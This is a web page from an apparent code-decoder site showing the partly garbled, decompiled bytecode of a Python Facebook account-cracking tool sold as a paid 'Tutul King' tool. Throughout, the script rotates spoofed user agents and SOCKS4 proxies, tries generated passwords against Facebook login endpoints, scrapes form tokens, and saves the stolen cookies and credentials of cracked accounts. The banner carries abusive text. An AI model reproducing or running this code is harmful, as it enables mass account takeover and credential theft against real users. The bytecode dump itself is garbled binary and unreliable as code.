Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

# Encoded By Tutul-King # Fb Link: https://www.facebook.com/Tutul.King.Ok.Bro # Fb Link:..

Decoded Output download

<? # Encoded By Tutul-King 
# Fb Link: https://www.facebook.com/Tutul.King.Ok.Bro 
# Fb Link: https://www.facebook.com/Tutul.Official.Account 
# https://github.com/Tutul-King 
 
import marshal 
exec(marshal.loads(b'@ddlZeejddS)Nsk1@ddlZeejddS)Nsj0@ddlZeejddS)Nsi/@ddlZeejddS)Nsh.@ddlZeejddS)Nsg-@ddlZeejddS)Nsf,@ddlZeejddS)Nse+@ddlZeejddS)Nsd*@ddlZeejddS)Nsc)@ddlZeejddS)Nsb(@ddlZeejddS)Nsa\'@ddlZeejddS)Ns`&@ddlZeejddS)Ns_%@ddlZeejddS)Ns^$@ddlZeejddS)Ns]#@ddlZeejddS)Ns\"@ddlZeejddS)Ns[!@ddlZeejddS)NsZ @ddlZeejddS)NsY@ddlZeejddS)NsX@ddlZeejddS)NsW@ddlZeejddS)NsV@ddlZeejddS)NsU@ddlZeejddS)NsT@ddlZeejddS)NsS@ddlZeejddS)NsR@ddlZeejddS)NsQ@ddlZeejddS)NsP@ddlZeejddS)NsO@ddlZeejddS)NsN@ddlZeejddS)NsM@ddlZeejddS)NsL@ddlZeejddS)NsK@ddlZeejddS)NsJ@ddlZeejddS)NsI@ddlZeejddS)NsH@ddlZeejddS)NsG
@ddlZeejddS)NsF@ddlZeejddS)NsE@ddlZeejddS)NsD
@ddlZeejddS)NsC	@ddlZeejddS)NsB@ddlZeejddS)NsA@ddlZeejddS)Ns@@ddlZeejddS)Ns?@ddlZeejddS)Ns>@ddlZeejddS)Ns=@ddlZeejddS)Ns<@ddlZeejddS)Ns;@ddlZeejddS)Ns:@ddlZeejddS)Ns9@ddlZeejddS)Ns8@ddlZeejddS)Ns7@ddlZeejddS)Ns6@ddlZeejddS)Ns5@ddlZeejddS)Ns4@ddlZeejddS)Ns3@ddlZeejddS)Ns2@ddlZeejddS)Ns1@ddlZeejddS)Ns0@ddlZeejddS)Ns/@ddlZeejddS)Ns.@ddlZeejddS)Ns-@ddlZeejddS)Ns,@ddlZeejddS)Ns+@ddlZeejddS)Ns*@ddlZeejddS)Ns)nddlZejdejdejdddlZddlZddlZddlZddlZddlZddlZddlZddl	Z	ddl
Z
ddlmZ
ddlmZddlmZddlmZ
ddlmZdd	lmZdd
lmZddlmZddlm Z!dd
l"m#Z$ddlmZ%ddlm&Z&ddl\'m(Z)ddlZddl*m+Z+ddl*m*Z*ddlm,Z,ddlm,Z-e&j.eZ/ddlZddlZddlZddlZGddZ0e*j1Z1e12dZ3e*j1Z4e4j5Z6e4j7Z8e4j9Z:ddlm;Z;ddlZddl	Z	ddl<Z<ddl=Z=ddl>Z>	ddlZddl?Z?ddlZddlZddlZddlZddlZddl
Z
ddlZddl@Z@ddlTddlmZn#eA$rejdYnYnxYwddlZddlZddlZddlZddlZddlZddlZddlZddl	Z	ddl
Z
ddlmZ
ddlmZddl?ZBddl*m+Z+ddl*m*Z*ddlm,Z,ddlm,Z-	ddl?Z?ddlmZCddlDZDddlEmFZFn+#eA$r#ejdejdYnwxYwdZGgZHgZIgZIgZJe?jKZLgZM	e?jNdjOZPeQddRePn#eS$rZTed YdZT[TndZT[TwwxYweQdd!UVZPeWd"D]oZXd#ZYejZd$d%Z[ejZd$d%Z\d&Z]ejZd\'d(ZTd)Z^ejZd$d%Z_ejZd$d*Z`ejZd$d*ZaejZd$d*Zbd+ZceYe[d,e\d-e]eTe^e_d,e`d,ead,ebd-ecZdeHeedd.Zfejggd/Z[d0Z\ejggd1Z]ejZd$d2ZTejggd1Z^d3Z_ejZd4d\'Z`d5ZaejZd6d7ZbejZd8d9Zcd:Zhefd-e[d;e\e]eTe^d<e_e`d,ead,ebd,ecd-ehZieIeeiqeWd=D]Zjd>ZYejZd\'d(Z[ejZd\'d(Z\ejggd1Z]ejggd1ZTejggd1Z^ejggd1Z_ejZd$d%Z`d?ZaejZd$d%ZbejZd$d%Zcd@ZheYe[dAe\e]eTe^e_e`eaebd,ecd-ehZkggdddggggggggf
\
ZlZmanaoapZqZrZsZtZuZvZwZxgZJggcZyZzdBZbdCZadDZYdEZ[dFZ\dGZTdHZ^gdIZ{gdJZ|dKZ}dLZ~dMZdNZdOZdPZdQZdRZdLZdSZdTZdUZdVZdWZdXZdYZdZZjdRZd[ZcdLZ`d\Zd]Zd^ZdVZ[d_Zejgeece`ee[gZd`ZddalmZddblmZeedcZeddkreddz
ZYdeZneZYdfZdgZdhZdiZdjZdkZdlZdmZdnZdoZdpZdqZdrZedsZddlZdZedtkrOeduZedvZedwkr"edxkre0dyejdzne0d{ed$z
ZUejd|d}Zd~ZdZdZGddZdZdZdZdangagadZdZdZdZedkrejdn#YnxYwejdn#YnxYwejdn#YnxYwejdn#YnxYwejdn#YnxYwedSdS)Nz+pip uninstall requests chardet urllib3 idnazpip uninstall requestszpip install requests)
BeautifulSoup)Table)Console)ThreadPoolExecutor)Group)Panelprint)Markdown)Columns)pretty)Text)date)datetime)sleepceZdZdZdS)TUTULc|dzD]S}tj|tjt	jdTdS)N
g?sysstdoutwriteflushtimer)selfzes  	Tutulking__init__zTUTUL.__init__#s\T		AJQJJu		N)__name__
__module____qualname__r r!rrr"s#r!r%H:%M)path)*z+pip install requests futures==2 > /dev/null)ConnectionErrorz9pip install mechanize requests futures bs4==2 > /dev/nullzpip install bs4c
|dd|ij}t|d}|jdd}d|d	D}t|d
kr:t
dtdtttttfznt
d
ttztt|D]H}t
dtdt|dz||ddtfzI|dd|ij}t|d}|jdd}d|d	D}t|d
kr2t
dtttttfzdSt
dttztt|D]?}t
dt|dz||ddtfz@t
ddS)Nz<https://mbasic.facebook.com/settings/apps/tabbed/?tab=activecookie)cookieszhtml.parserformpost)methodcg|]	}|j
Sr%text.0is r
<listcomp>zcek_apk.<locals>.<listcomp>b---qAF---r!h3rz%su4[%s%s] %sSorry there is no Active Apk%s     z![] %s Your Active Apps   :z[%s%s] z%s %szDitambahkan padaz Ditambahkan padaz>https://mbasic.facebook.com/settings/apps/tabbed/?tab=inactivecg|]	}|j
Sr%r1r3s rr6zcek_apk.<locals>.<listcomp>nr7r!z<%s[%s!%s] %sSorry there is no Expired Apk%s        
z![] %s Your Expired Apps   :z[%s%s] %s %sKedaluwarsaz Kedaluwarsaz[1;91m [1;92m[1;92m [1;93m[1;94m[1;95m[1;96m[1;95m[1;94m[1;96m[1;92m5[1;92m [1;91m )getr2rfindfind_alllenr
PNMBGREENrangeHreplaceWHITE)sessioncokiwsopxgamer5s    rcek_apkrO^sX
kkPZbcgYhkiinA
-
(
(Cv&&&A--AJJt,,---D
4yy!||HHHH!AaPQRSTUUUU
5!55u=>>>s4yy!!	h	hA$A$$$a!DGOO<NOb,c,cde%ffggggkkR\dei[jkkkpA
-
(
(Cv&&&A--AJJt,,---D
4yy!||
NPQRSTUVWXY{Z[[[[[
9%991=>>>s4yy!!	H	HA/1QqSa~)V)VWX"YYZZZZG
H
H
H
H
Hr!zwhttps://api.proxyscrape.com/v2/?request=displayproxies&protocol=socks4&timeout=100000&country=all&ssl=all&anonymity=allz	.prox.txtrKz* [1;91m[1;96m[1;92m [1;96m[Tutul-XDri\'z!Mozilla/5.0 (Symbian/3; Series60/r9	Nokiadi\'zl/110.021.0028; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/535.1 (KHTML, like Gecko) NokiaBrowser/zMobile Safari/535.1. zCMozilla/5.0 (Linux; Android 9; SM-G950U1 Build/PPR1.180610.011; wv))6789101112z en-us; GT-)[email protected]/537.36 (KHTML, like Gecko) Chrome/I0ihi$(zMobile Safari/537.36 Puffin/z; z) 
z"Mozilla/5.0 (SAMSUNG; SAMSUNG-GT-SzC; U; Bada/1.2; en-us) AppleWebKit/533.1 (KHTML, like Gecko) Dolfin/zMobile WVGA SMM-MMS/1.2.0 OPN-B/rMmbasicmgfreeweb	developer)z|Mozilla/5.0 (Linux; Android 13.0; Pixel XL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36z|Mozilla/5.0 (Linux; Android 13.0; Nexus 6P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 13.0; Samsung Galaxy S21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 13.0; OnePlus 9 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 13.0; Xiaomi Mi 11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36z{Mozilla/5.0 (Linux; Android 13.0; Pixel 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 13.0; Samsung Galaxy S20) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 13.0; Samsung Galaxy S10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 13.0; Google Pixel 4a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 13.0; OnePlus 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 13.0; Google Pixel 4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 13.0; Samsung Galaxy Note 20) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36z}Mozilla/5.0 (Linux; Android 13.0; OnePlus 9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 13.0; Google Pixel 5a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 13.0; Samsung Galaxy S21 Ultra) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36)zMozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/103.0.5060.71 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/396.1.0.28.104;]zMozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/94.0.4606.85 Mobile Safari/537.36[FBAN/EMA;FBLC/en_US;FBAV/330.0.0.10.108;]z	Mozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/94.0.4606.85 Mobile Safari/537.36[FBAN/EMA;FBLC/en_US;FBAV/334.0.0.17.101;]z	Mozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/109.0.5414.85 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/397.0.0.23.404;]z	Mozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/103.0.5060.71 Mobile Safari/537.36[FBAN/EMA;FBLC/en_GB;FBAV/334.0.0.17.101;]zMozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/106.0.5249.126 Mobile Safari/537.36[FBAN/EMA;FBLC/en_US;FBAV/321.0.0.13.113;]z	Mozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Mobile Safari/537.36zMozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/108.0.5359.128 Mobile Safari/537.36[FBAN/EMA;FBLC/en_US;FBAV/337.0.0.7.102;]zMozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/108.0.5359.128 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/397.0.0.23.404;]zMozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/97.0.4692.98 Mobile Safari/537.36[FBAN/EMA;FBLC/en_US;FBAV/336.0.0.11.99;]zMozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/108.0.5359.128 Mobile Safari/537.36[FBAN/EMA;FBLC/en_GB;FBAV/337.0.0.7.102;]zMozilla/5.0 (Linux; U; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/108.0.5359.128 Mobile Safari/537.36 OPR/10.8.2254.63920zMozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/108.0.5359.128 Mobile Safari/537.36[FBAN/EMA;FBLC/en_US;FBAV/336.0.0.11.99;]zMozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/94.0.4606.85 Mobile Safari/537.36[FBAN/EMA;FBLC/en_US;FBAV/335.0.0.15.96;]zMozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/107.0.5304.105 Mobile Safari/537.36[FBAN/EMA;FBLC/en_US;FBAV/288.0.0.11.115;]zMozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/106.0.5249.126 Mobile Safari/537.36[FBAN/EMA;FBLC/en_US;FBAV/325.0.1.4.108;]zMozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/97.0.4692.98 Mobile Safari/537.36[FBAN/EMA;FBLC/en_US;FBAV/288.0.0.11.115;]zMozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/107.0.5304.141 Mobile Safari/537.36[FBAN/EMA;FBLC/en_US;FBAV/334.0.0.17.101;]zMozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/103.0.5060.129 Mobile Safari/537.36[FBAN/EMA;FBLC/en_US;FBAV/330.0.0.10.108;]zMozilla/5.0 (Linux; Android 11; Nokia C2 2nd Edition Build/RP1A.200720.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/108.0.5359.128 Mobile Safari/537.36[FBAN/EMA;FBLC/en_GB;FBAV/335.0.0.15.96;]z[38;5;208mz[1;92mz	[[1;92mz[1;33mz[1;34mz[1;35mz[1;97mz[1;91mz[1;93mz[1;94mz[1;95mz[1;96mz[0mz[1;30mz[41m[1;97mz[mz[93mz[32mz[95mz[33mz[0;34mcJtjdtdSNclear)ossystembannerr%r!rrrsIg
HHHHHr!)	localtime)rz	[1;91mPMz	[1;96mAMc|dzD]S}tj|tjt	jdTdS)Nrgr)urs r_TUTULKING_rsQTRRA#***1---cj.>.>.@.@.@EARARARARRRr!c$tddS)Nu
[0;92m
[0;91m [0;92m   [0;91m [0;92m   [0;91m [0;92m   
[0;91m   [0;92m    [0;91m  [0;92m    [0;91m  [0;92m  
[0;91m   [0;92m    [0;91m  [0;92m    [0;91m  [0;92m  
[0;91m   [0;92m    [0;91m  [0;92m    [0;91m  [0;92m  
[0;91m   [0;92m  [0;91m   [0;92m   [0;91m [0;92m 
[0;92m        [0;92m

[0;41m    [ WORKING ONLY MOBILE DATA ]     [0;92m

[0;94m[1;33m 
[Author          [1;38mMR-TUTUL ][1;38m   [1;31m 
[Facebook         Tutul King ]   [1;97m 
[Github          [1;38mTutul-King ]  [1;34m  
[Whatsapp         01608843956 ] [1;35m 
[TOOLS           PAID ]     [1;32m  
[VERSION          10.3 ]     [1;35m 
[0;94m[1;31mr	r%r!rrrs)efffffr!uN[97;1m[[92;1m[97;1m] [38;5;208mTutul King TooLs Daily Update)[0;97mu2[97;1m[[92;1m[97;1m][0;92m 15 Days 500 Takaz0[97;1m[[92;1m+[97;1m][0;92m 30 Days 900 TakauN[92;1m[97;1m[[92;1m+[97;1m] [1;92mYOU NEED TOOLS PASS CONTACT ADMINuQ[92;1m[97;1m[[92;1m+[97;1m] [1;93mHii, ByPasar i Fuck Your System-!uc[97;1m[97;1m[[92;1m[97;1m] [1;32mNote : [0;41mByPass: User Fuck Your Mother):[0;97muQ[97;1m[0;92mFREE USER NOT COME INBOXu<[97;1m[[92;1m[97;1m][38;5;208m====================u[97;1m[[92;1m+[97;1m] [0;93mFREE-FIRE-ID CLONING
[97;1m[[92;1m[97;1m] [0;92mONLY ACTIVE ID CLONING
[97;1m[[92;1m+[97;1m] [0;93mUnActive id Not Allow
[97;1m[[92;1m[97;1m][0;92m Cp id Login 60%
[97;1m[[92;1m+[97;1m] [0;93mWi-fi Working 80%[1;37mc
tjdtttjttjz}d|}	tjdj	}||vrXttttttj}tdStttttttt tt"tt$tt&td|zt)dd|z}tjd|zt+ft-jdt1dS#t3jYdSxYw)	Nr-z<https://github.com/Ariyan-143/Tutul/blob/main/Tutul-Paid.txtu3[97;1m[[92;1m[97;1m][0;92m Your Kay: [0;41muG[0;97m[97;1m[[92;1m[97;1m][0;92m Press Enter To Send Key[0;97muTAssalamu%20Alaikum%20%20Please%20Approve%20My%20Key%20Tutul%20King%20ToOLs%20%20z+am start https://wa.me/+8801608843956?text=r9)rrrstrgeteuidgetloginjoinrequestsr<r2r
fuckyoursalihedaborakarent	Tutulbossrabalabal2FuckFuck2abal4inputapprovalrrmeyexudirexit)uuididhttpCahtmsgtkss   rrrs)G(((	RZ\\		S//	/$
xx~~"|Z[[`H	X~~LN
cggg
dIIDkkkElllDkkkElllElllNrQRRRfggg
cdf
fchjhqs`adsdieiefnfpfpipip
jmmmjjjjjHJJJJJJs:A3G*/C9G**Hc$tddS)Nz-------------------r	r%r!rnaimar7sr!lM?uD[92;1m[97;1m[[92;1m+[97;1m] [1;92mEnter Username:[97;1m uD[92;1m[97;1m[[92;1m+[97;1m] [1;93mEnter Password:[1;92m nrz8 [97;1m[[92;1m+[97;1m] [1;92mLogin Successfully Broz%espeak -a 300 " Login, Successfully"zE [97;1m[[92;1m+[97;1m] [1;91mIncorrect Pass Please Trying[1;90mrcPtjdttdt	dtd}|dvr>t
tttjd|dvrtdSdS)Nrz+[97;1m[[92;1mF[97;1m] [10;92mFILE CLONEz=[92;1m[0;97m===============================================z7[92;1m[97;1m[[92;1m+[97;1m][0;92m CHOOSE :[1;37m )rbz:xdg-open https://www.facebook.com/profile.php?id=654929163)rt)
rrrrr
rC1Y2BERr)_____TUTULKING_____s rmenurOs7
GHHH
LMMMhii5 $$$$$$%%%)HIII5 &&&&&! r!ct|dkr|dddvrd}n8|dddvrd}n(|dddvrd}n|dd	d
vrd}n|dd	dvrd}n|dd
dvrd}n|dd
dvrd}n|dd
dvrd}n|dd
dvrd}n|dd
dvrd}n|dd
dvrd}n|dddvrd}n|dddvrd}n|dddvrd }nr|ddd!vrd"}nc|ddd#vrd$}nT|ddd%vrd&}nEd\'}nBt|d(vrd)}n.t|dkrd*}nt|d	krd+}nd\'}|S),Nrw)
10000000002009rQ)	100000000)10000000)100000010000011000002100000310000041000005)10000061000007100000810000092010)100001z	2010-2011)100002100003z	2011-2012)100004z	2012-2013)100005100006z	2013-2014)100007100008z	2014-2015)1000092015)10001z	2015-2016)10002z	2016-2017)100032018)100042019)100052020)100061000710008z	2021-2022)rQrwz	2008-2009z	2007-2008z	2006-2007)r?)fxtahunzs rtahunngresGGRKKWvff	"1"vvff	"1"vvff	"1"vNNNX^vv	"1"v:::F66	"1"v{ff	"1"v$$${ff	"1"v{ff	"1"v$$${ff	"1"v$$${ff	"1"vvff	"1"v{ff	"1"v{ff	"1"vvff	"1"vvff	"1"vvff	"1"v***K66vv	"gg&&	"ggqjj&&	"ggqjj&&
fr!z(----------------------------------------cntjdtdSr)rrr`plerrr%r!rrrs\'IgCCIIKKKKKr!ceZdZdZdZdS)r`cg|_dSN)r)rs rr z
D.__init__s
$\'\'\'r!c2tjdt	tdt	d}t|dD].}t|	/tdtttztdS#t$r8td|ztjdt!YdSwxYw)Nrz5[1;32m[ Put File Example: /sdcard/file.txt Etc...]z2[97;1m[[92;1m+[97;1m] INPut FILE NAME :[92;1m rPzB[97;1m[[92;1m+[97;1m] [10;92mYOUR TOTAL IDz [10;91m: [10;92mz.[97;1m[[92;1m+[97;1m] FILE %s NOT FOUND[0m)rrrr
ropen	readlinesrappendstriprr?SettingsIOErrorrrrb)rfileXlines  rrzD.plerrs)G(((		CDDDRSS5E3))++tIIdjjll	`adehikelelamam	mnnn:::::		Eu	MNNNtzZ[}}}333333sB.C>DDN)r"r#r$r rr%r!rr`r`s2r!r`c4tdtd}|dvrzg}ttD]}||t|}|dz
}t
|D]\'}t|||dz}(nn|dvrMtD]D}tj	dtt}t
||Entdttdtd	}|dvrtd
ntd
td}|dvrmtd
tdtd}	|	d}
|
D]}t |ntdt#tdS)Nz*[97;1m[[92;1m1[97;1m] CLONE ONLY MIX IDz2[97;1m[[92;1m+[97;1m] [10;92mCHOOSE :[10;92m )rt00r9)101rz0[1;92m[[1;36m[1;92m][0;92mWRONG OPTION BARAz([97;1m[[92;1m1[97;1m] [10;95mUPDATE z*[97;1m[[92;1m+[97;1m] CHOOSE :[10;92m mobilez[97;1m[[92;1mM[97;1m] MENU [1;94m MANUAL PASSWORD [10;97m[[1;91mM[10;97m]
[97;1m[[92;1mA[97;1m][1;93m AUTO PASSWORD [10;97m[[1;96mA[10;97m] [1;92m
[97;1m[[92;1m+[97;1m] CHOOSE : [1;92m)yrqyaz\'Add Password Manual Minimam 6 Characterz5[1;92m[[1;32m[1;92m][0;92mAdd Password Manual : ,no)r
rsortedrrr?rEid2randomrandintinsertrr/methodepwplusssplitpwnyapasswrd)humudabacotbcmbcmixmudxxhcpwpluspwkupwkuhxpws      rrrs=>>>OPP*	$bzze;;u	$ii#A$Cjjd::d4j!844	JeqS""2::bFGGG&&&>???DEE*--	..
W	X	X
i	..2333
PQQ$

3%
c<<
..r!c	tjdttdt	ttztdt	tzdzt	tdzdztzdztdtdtdtdtd	td
td5}tD]~}|d
d|d
d}}|dd}g}t|dkrt|dkrnP||||dz||dz||dz||dz||dz||dz||dz||dz||dz||dz||dz||dz||dz||dz||d z|d!nt|dkr||n||||dz||dz||dz||dz||dz||dz||dz||dz||dz||dz||dz||dz||dz||dz||d z|d!d"t$vr t&D]}||n	d#t(vr|t,||2d$t(vr|t.||Yd%t(vr|t0||	dddn#1swxYwYtd&td\'td(t2d)t4zt7d*dS)+NruP[92;1m[97;1m[[92;1m[97;1m] [10;92mYOUR TOTAL ID [1;34m: [10;92muF[92;1m[97;1m[[92;1m+[97;1m] CLONING TIME  [1;34m: [10;96m:rTrVuP[92;1m[97;1m[[92;1m[97;1m] [10;92mSTART DATE   [1;34m: [10;92mz[1;91m/[1;92mu}[92;1m[97;1m[[92;1m+[97;1m] [38;5;208mNOTE = [10;92m[USE AIRPLANE MODE ON[10;91m/[10;92mOF FOR OK IDz[10;97m] uA[92;1m[1;97m=============================================max_workers|rr9rr@123123123412345123456z@#@@@z@@@z@@@@111r\r]1431122
i love yourrr|touchz8
[10;97m===============================================u?[92;1m[97;1m[[92;1m+[97;1m] [10;93mCLONING COMPLETE uJ[92;1m[97;1m[[92;1m+[97;1m] [10;92mYOUR TOTAL OK IDz [10;91m: z%s uI[92;1m[97;1m[97;1m[[92;1m+[97;1m] [10;91mCLICK ENTER TO EXIT )rrrr
rr?ralttaghabutatredrrlowerrrrr/submitcrack	crackfree
cracktouchhokr)poolyuzongidfnmffrspwvxpwds    rrrs7opstwxzt{t{p|p||}}}bcfghciciijmmnqrtrvrvwxrynznzz{~~ADDEHHIIIgoqggIKggbdggghhhcdddPQQQ
r8$d7$7$f
\\#

q
!&,,s"3"3A"6"<"<">">s3	3	3	3	#hhqjj
3xxzz	ZZ___ZZF
ZZE	ZZF
ZZGZZHZZDZZCZZDZZE	ZZF
ZZE	ZZDZZDZZE	ZZF
ZZ
3xxzzZZ____ZZ___ZZF
ZZE	ZZF
ZZGZZHZZDZZCZZDZZE	ZZF
ZZE	ZZDZZDZZE	ZZF
ZZ
gooZZ&KKc#&KK	#c""""6KK
3s###o7$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$rEFFFXYYYlfglllnpqrrrdeeeeesRVVVc	tjtttt
ttg}tj	
d|dtdtdtttdttttd|dtdtd|dtt td	tj	tjt$}tjt&}t)j}|D]D}	tjt,}d
d|zi}|jdd
|dd
ddddddddd
|d|zdz}	t5jdt9|	jdt5jdt9|	jd|dd|d}
d d!|	j !"D}|d"z
}dd#d
d$d%|ddddddd&ddd\'}|#d(|
d)|i|d*|+}
d,|
j !$vrtKd-|zd.z|zd/ztMj\'d0tQd1tRzd2
|d.z|zd3ztT+|d4z|ztXdz
a,n-d5|j !$vrt dz
a|
j !}d d6|j !"D}tKd7|d.|d8|d9tMj\'d:t[t\|tT+|d4z|zn1#t(j/j0$rtcj2d;YBwxYwtdz
adS)<Nz	
[10;92mz
[Mr.Tutul]z	[1;90m>~[rx]uOKz] httpz	socks4://zm.facebook.comrztext/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9zmark.via.gpzsame-origincorsemptydocumentzhttps://m.facebook.com/zgzip, deflate brzen-GB,en-US;q=0.9,en;q=0.8)
Hostupgrade-insecure-requests
user-agentacceptdntx-requested-withsec-fetch-sitesec-fetch-modesec-fetch-usersec-fetch-destrefereraccept-encodingaccept-languagez8https://p.facebook.com/login/device-based/password/?uid=z)&flow=login_no_pin&refsrc=deprecated&_rdrname="lsd" value="(.*?)"r9name="jazoest" value="(.*?)"z)https://p.facebook.com/login/save-device/login_no_pin)lsdjazoestuidnextflowpass;c"g|]\}}|d|
S=r%r4keyvalues  rr6zcrack.<locals>.<listcomp>s\'^^^*#u###uu-^^^r!z m_pixel_ratio=2.625; wd=412x756	max-age=0zhttps://m.facebook.comz!application/x-www-form-urlencodedzlhttps://m.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F)r8
cache-controlr9originzcontent-typer:r;r=r>r?r@rArBrCrDzChttps://p.facebook.com/login/device-based/validate-password/?shbl=0r+F)datar,headersallow_redirectsproxies
checkpointz
[10;95m[Tutul-CP]  | rzespeak -a 300 " Cp,"zCP/rrrc_userc"g|]\}}|d|
SrPr%rRs  rr6zcrack.<locals>.<listcomp>+s\'aaa:3333.aaar!u
[10;92m[Tutul-Ok] uD
[10;93m[]= [10;96m[[10;93mCOOKIES[10;96m] [1;91m: [10;92mz	
 [1;37m espeak -a 300 " Tutul, Ok, id"rw)3rchoicerzkr\'brrMrrrr@loopr?rrFr(rugenugen2rSessionproxrYupdater<researchrr2grouprr,get_dictitemsr.keysr
rrrcpcakunrcprOrI
exceptionsr)rr)r+r.bouaua2sespwnipproxspdataakokiheadeporJkukis        rr$r$smQq1QqM""D"DDDDqDD1DdDADDPQDSVWYSZSZD\]DD`bDDghDDklDDprDDwxDz|D~DDDEEEmD
}U""R!
}T3;s?
#5;.3\_jJQThuGTfl~EWalEXj}Y	Z	Z	[	[	[	
wwI#MNyyzz15s16{{CCII!LLWYW`aBEFGFLBMBMXNXNXTXTUVXWXW^aiT\jrtvv5**^^	@R@R@T@T@Z@Z@\@\^^^
_
_4	++4!+Z]gPsACMmAN`mEW^pzE	s
FXkG
H
H5V\aksuyjzDIZ_hm	n	n2bj))++002222	
&s
*E
1"
4R
7888I$%%%s3c%il4/000KKC
EB	ECK((**//1111EB					D::aaAUAUAWAWA]A]A_A_aaabbD	a#aa"aaNRaaabbbI0111GDKKC
	E
			,:b>>>>>qs:HQ
C:Q

(Q98Q9cg}g}tjtjtjdt	td}tjdt	t
dtd}tjdt	ttd}t|D]C}d	dtdD}|
|Dtd	
5}ttt|}t
d|zdzt
d
|zt
dtdt dt"dt$d	tt&zdztt)dzdzt*zdzt
d|D]R}	|	|	dd|	dd||	z||	ddzdddddddddd d!d"d#d$g}
||	z}||||
|S	dddn#1swxYwYt
